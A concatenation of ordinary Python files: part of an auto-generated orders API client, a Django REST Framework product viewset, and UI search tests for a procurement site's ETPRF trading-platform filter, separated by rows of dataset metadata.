all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method patch_shipping_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `patch_shipping_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `patch_shipping_address`")
# verify the required parameter 'partial_address' is set
if ('partial_address' not in params) or (params['partial_address'] is None):
raise ValueError("Missing the required parameter `partial_address` when calling `patch_shipping_address`")
resource_path = '/orders/{direction}/{orderID}/shipto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'partial_address' in params:
body_params = params['partial_address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def remove_promotion(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_promotion(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.remove_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
else:
(data) = self.remove_promotion_with_http_info(direction, order_id, promo_code, **kwargs)
return data
def remove_promotion_with_http_info(self, direction, order_id, promo_code, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.remove_promotion_with_http_info(direction, order_id, promo_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param str promo_code: Promo code of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'promo_code']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_promotion" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `remove_promotion`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `remove_promotion`")
# verify the required parameter 'promo_code' is set
if ('promo_code' not in params) or (params['promo_code'] is None):
raise ValueError("Missing the required parameter `promo_code` when calling `remove_promotion`")
resource_path = '/orders/{direction}/{orderID}/promotions/{promoCode}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
if 'promo_code' in params:
path_params['promoCode'] = params['promo_code']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def save(self, direction, order_id, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.save(direction, order_id, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.save_with_http_info(direction, order_id, order, **kwargs)
else:
(data) = self.save_with_http_info(direction, order_id, order, **kwargs)
return data
def save_with_http_info(self, direction, order_id, order, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.save_with_http_info(direction, order_id, order, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Order order: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method save" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `save`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `save`")
# verify the required parameter 'order' is set
if ('order' not in params) or (params['order'] is None):
raise ValueError("Missing the required parameter `order` when calling `save`")
resource_path = '/orders/{direction}/{orderID}'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'order' in params:
body_params = params['order']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_billing_address(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_billing_address(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_billing_address_with_http_info(direction, order_id, address, **kwargs)
else:
(data) = self.set_billing_address_with_http_info(direction, order_id, address, **kwargs)
return data
def set_billing_address_with_http_info(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_billing_address_with_http_info(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_billing_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `set_billing_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `set_billing_address`")
# verify the required parameter 'address' is set
if ('address' not in params) or (params['address'] is None):
raise ValueError("Missing the required parameter `address` when calling `set_billing_address`")
resource_path = '/orders/{direction}/{orderID}/billto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address' in params:
body_params = params['address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def set_shipping_address(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_shipping_address(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.set_shipping_address_with_http_info(direction, order_id, address, **kwargs)
else:
(data) = self.set_shipping_address_with_http_info(direction, order_id, address, **kwargs)
return data
def set_shipping_address_with_http_info(self, direction, order_id, address, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.set_shipping_address_with_http_info(direction, order_id, address, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Address address: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'address']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_shipping_address" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `set_shipping_address`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `set_shipping_address`")
# verify the required parameter 'address' is set
if ('address' not in params) or (params['address'] is None):
raise ValueError("Missing the required parameter `address` when calling `set_shipping_address`")
resource_path = '/orders/{direction}/{orderID}/shipto'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'address' in params:
body_params = params['address']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def ship(self, direction, order_id, shipment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.ship(direction, order_id, shipment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Shipment shipment: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.ship_with_http_info(direction, order_id, shipment, **kwargs)
else:
(data) = self.ship_with_http_info(direction, order_id, shipment, **kwargs)
return data
def ship_with_http_info(self, direction, order_id, shipment, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.ship_with_http_info(direction, order_id, shipment, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:param Shipment shipment: (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id', 'shipment']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method ship" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `ship`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `ship`")
# verify the required parameter 'shipment' is set
if ('shipment' not in params) or (params['shipment'] is None):
raise ValueError("Missing the required parameter `shipment` when calling `ship`")
resource_path = '/orders/{direction}/{orderID}/ship'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'shipment' in params:
body_params = params['shipment']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def submit(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.submit_with_http_info(direction, order_id, **kwargs)
else:
(data) = self.submit_with_http_info(direction, order_id, **kwargs)
return data
def submit_with_http_info(self, direction, order_id, **kwargs):
"""
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.submit_with_http_info(direction, order_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str direction: Direction of the order, from the current user's perspective. Possible values: incoming, outgoing. (required)
:param str order_id: ID of the order. (required)
:return: Order
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['direction', 'order_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method submit" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'direction' is set
if ('direction' not in params) or (params['direction'] is None):
raise ValueError("Missing the required parameter `direction` when calling `submit`")
# verify the required parameter 'order_id' is set
if ('order_id' not in params) or (params['order_id'] is None):
raise ValueError("Missing the required parameter `order_id` when calling `submit`")
resource_path = '/orders/{direction}/{orderID}/submit'.replace('{format}', 'json')
path_params = {}
if 'direction' in params:
path_params['direction'] = params['direction']
if 'order_id' in params:
path_params['orderID'] = params['order_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json', 'text/plain; charset=utf-8'])
# Authentication setting
auth_settings = ['oauth2']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Order',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 44.579091
| 195
| 0.582213
| 12,279
| 114,702
| 5.256617
| 0.023373
| 0.030908
| 0.032969
| 0.023425
| 0.972857
| 0.962554
| 0.95865
| 0.954807
| 0.951058
| 0.94686
| 0
| 0.001316
| 0.330805
| 114,702
| 2,572
| 196
| 44.596423
| 0.839587
| 0.35009
| 0
| 0.811229
| 1
| 0
| 0.204687
| 0.037315
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034988
| false
| 0
| 0.005696
| 0
| 0.092758
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fce10226c020f854fc867dc34e7ec5a92e4a6f62
| 6,690
|
py
|
Python
|
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
marketplace_api/apps/products/api/views/product_viewsets.py
|
JOSECONDORI5/API-marketplace
|
2a1aed133c0b49e0e89f3a05cc94aa2b711d36e0
|
[
"MIT"
] | null | null | null |
from rest_framework import generics, status
from rest_framework import viewsets
from rest_framework.response import Response
from apps.base.api import GeneralListApiView
from apps.products.api.serializers.product_serializer import ProductSerializer
from apps.users.authentication_mixins import Authentication
class ProductViewSet(Authentication, viewsets.ModelViewSet):
serializer_class = ProductSerializer
def get_queryset(self, pk=None):
if pk is None:
return self.get_serializer().Meta.model.objects.filter(state=True)
return self.get_serializer().Meta.model.objects.filter(id=pk, state=True).first()
def list(self, request):
product_serializer = self.get_serializer(self.get_queryset(), many=True)
# print(self.user)
return Response(product_serializer.data, status=status.HTTP_200_OK)
def create(self, request):
# Send information to serializer
serializer = self.serializer_class(data=request.data)
if serializer.is_valid():
serializer.save()
return Response({'message': 'Producto creado correctamente!'}, status=status.HTTP_201_CREATED)
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def update(self, request, pk=None):
if self.get_queryset(pk):
# Send information to serializer referencing the instance
product_serializer = self.serializer_class(self.get_queryset(pk), data=request.data)
if product_serializer.is_valid():
product_serializer.save()
return Response(product_serializer.data, status=status.HTTP_200_OK)
return Response(product_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
def destroy(self, request, pk=None):
product = self.get_queryset().filter(id=pk).first()
if product:
product.state = False
product.save()
return Response({'message': 'Producto eliminado correctamente!'}, status=status.HTTP_200_OK)
return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
# class ProductListAPIView(GeneralListApiView):
# serializer_class = ProductSerializer
# class ProductListCreateAPIView(generics.ListCreateAPIView):
# serializer_class = ProductSerializer
# queryset = ProductSerializer.Meta.model.objects.filter(state=True)
#
# # def get_queryset(self):
# # assert
# # return self.queryset
#
# def post(self, request):
# # Send information to serializer
# serializer = self.serializer_class(data=request.data)
# if serializer.is_valid():
# serializer.save()
# return Response({'message': 'Producto creado correctamente!'}, status=status.HTTP_201_CREATED)
# return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# class ProductRetrieveUpdateDestroyAPIView(generics.RetrieveUpdateDestroyAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self, pk=None):
# if pk is None:
# return self.get_serializer().Meta.model.objects.filter(state=True)
# else:
# return self.get_serializer().Meta.model.objects.filter(id=pk, state=True).first()
#
# def patch(self, request, pk=None):
# # product = self.get_queryset().filter(id=pk).first()
# # if product:
# if self.get_queryset(pk):
# # product_serializer = self.serializer_class(product)
# product_serializer = self.serializer_class(self.get_queryset(pk))
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
#
# def put(self, request, pk=None):
# if self.get_queryset(pk):
# # Send information to serializer referencing the instance
# product_serializer = self.serializer_class(self.get_queryset(pk), data=request.data)
# if product_serializer.is_valid():
# product_serializer.save()
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response(product_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
#
# def delete(self, request, pk=None):
# product = self.get_queryset().filter(id=pk).first()
# if product:
# product.state = False
# product.save()
# return Response({'message': 'Producto eliminado correctamente!'}, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
# def get(self, request, pk=None):
# pass
# class ProductDestroyAPIView(generics.DestroyAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self):
# return self.get_serializer().Meta.model.objects.filter(state=True)
#
# def delete(self, request, pk=None):
# product = self.get_queryset().filter(id=pk).first()
# if product:
# product.state = False
# product.save()
# return Response({'message': 'Producto eliminado correctamente!'}, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
# class ProductUpdateAPIView(generics.UpdateAPIView):
# serializer_class = ProductSerializer
#
# def get_queryset(self, pk):
# # return self.get_serializer().Meta.model.objects.filter(state=True)
# return self.get_serializer().Meta.model.objects.filter(state=True).filter(id=pk).first()
#
# def patch(self, request, pk=None):
# # product = self.get_queryset().filter(id=pk).first()
# # if product:
# if self.get_queryset(pk):
# # product_serializer = self.serializer_class(product)
# product_serializer = self.serializer_class(self.get_queryset(pk))
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response({'error': 'No existe un producto con estos datos!'}, status=status.HTTP_400_BAD_REQUEST)
#
# def put(self, request, pk=None):
# if self.get_queryset(pk):
# product_serializer = self.serializer_class(self.get_queryset(pk), data=request.data)
# if product_serializer.is_valid():
# product_serializer.save()
# return Response(product_serializer.data, status=status.HTTP_200_OK)
# return Response(product_serializer.errors, status=status.HTTP_400_BAD_REQUEST)
| 46.458333
| 114
| 0.679223
| 763
| 6,690
| 5.78637
| 0.123198
| 0.092412
| 0.076104
| 0.043035
| 0.807022
| 0.807022
| 0.807022
| 0.786863
| 0.775085
| 0.774405
| 0
| 0.011941
| 0.21136
| 6,690
| 143
| 115
| 46.783217
| 0.824867
| 0.663229
| 0
| 0.057143
| 0
| 0
| 0.055892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.171429
| 0
| 0.628571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
1e24003b925d542d0967fb8b130c585bd9cf072e
| 9,028
|
py
|
Python
|
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_SM/test_ploshadki/test_ploshadka_ETPRF.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
def test_sm_etprf_include_eic_yestoday(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(3, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 100
def test_sm_etprf_without_eic_yestoday(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(3, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.find_in_container_number(11, 2, 1)
app.testHelperSMSearch.find_in_container_number(11, 6, 3)
app.testHelperSMSearch.find_in_container_number(11, 6, 4)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 30
def test_sm_etprf_include_eic_yestoday_today(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(11, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 100
def test_sm_etprf_without_eic_yestoday_today(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(11, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.find_in_container_number(11, 2, 1)
app.testHelperSMSearch.find_in_container_number(11, 6, 3)
app.testHelperSMSearch.find_in_container_number(11, 6, 4)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 30
def test_sm_etprf_include_eic_7_days(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
# Искать в контейнере (всего контейнеров + 1, номер контейнера(если 0 - случайный выбор), номер строки
# в контейнере если 0 - случайный выбор)
name = 'ETPRF'
app.testHelperSMSearch.select_first_publish_date(4, 0)
app.testHelperSMSearch.find_torgovaya_ploschadka(name)
app.testHelperSMSearch.press_search_button()
assert app.testHelperSMSearch.check_results() != '0'
assert int(app.testHelperSMSearch.check_results()) > 600
def test_sm_etprf_without_eic_7_days(app):
app.testhelpersm.refresh_page()
app.session.open_SM_page(app.smPurchases)
app.session.ensure_login_sm(app.username, app.password)
app.session.ensure_login_sm(app.username, app.password)
app.session.open_SM_page(app.smPurchases)
app.testHelperSMSearch.expand_show_hide()
